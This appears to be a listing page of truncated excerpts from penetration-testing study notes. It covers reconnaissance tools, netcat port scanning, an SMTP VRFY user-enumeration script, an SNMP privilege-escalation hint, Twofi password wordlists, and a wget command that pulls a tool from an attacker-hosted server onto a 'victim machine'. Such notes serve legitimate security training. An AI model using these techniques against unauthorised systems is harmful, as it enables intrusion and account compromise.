Python3 Via web: # On our machine: python3 -m http.server 8888 # On victim machine: wget http://10.10.16.5:8888/pspy64 chmod +x pspy64 Python2 python -m SimpleHTTPServer 7331 PHP php -S 0.0....
The Harvester theHarvester -d megacorpone.com -b google The Harvester doesn’t work well on newer versions of Kali; use the Docker image if that is the case. docker run -ti --rm thehar...
The simplest option is to set the -maxtime option, which will halt the scan after the specified time limit: nikto -host=http://www.megacorpone.com -maxtime=30s Our second option is to tune the sca...
Shodan Shodan Search engine for devices connected to the Internet. You can use various filters while using Shodan, among them: hostname, port, country. Censys Censys Search Engine ...
SNMP Priv Escalation If port 161 is open internally, you can search for the /etc/snmp/snmpd.conf file and review its content. Notice that the private community is readable and writable: rocommunity public...
VRFY USER ENUMERATION With the user and IP supplied as input: #!/usr/bin/python import socket import sys if len(sys.argv) != 3: print("Usage: vrfy.py <IP> <users_list>") ...
TCP Scanning The -w option specifies the connection timeout in seconds and -z is used to specify zero-I/O mode, which will send no data and is used for scanning: nc -nvv -w 1 -z 10.11.1.220 3388-...
NBTSCAN nbtscan -r 10.11.1.0/24
Social-Searcher Useful resource to gather info from several social networks: Social-Searcher Twofi Scans a user’s Twitter feed and generates a personalized wordlist used for password attacks again...
To get started, let’s simply run recon-ng: kali@kali:~$ recon-ng [*] Version check disabled. /\ / \\ /\ Spon...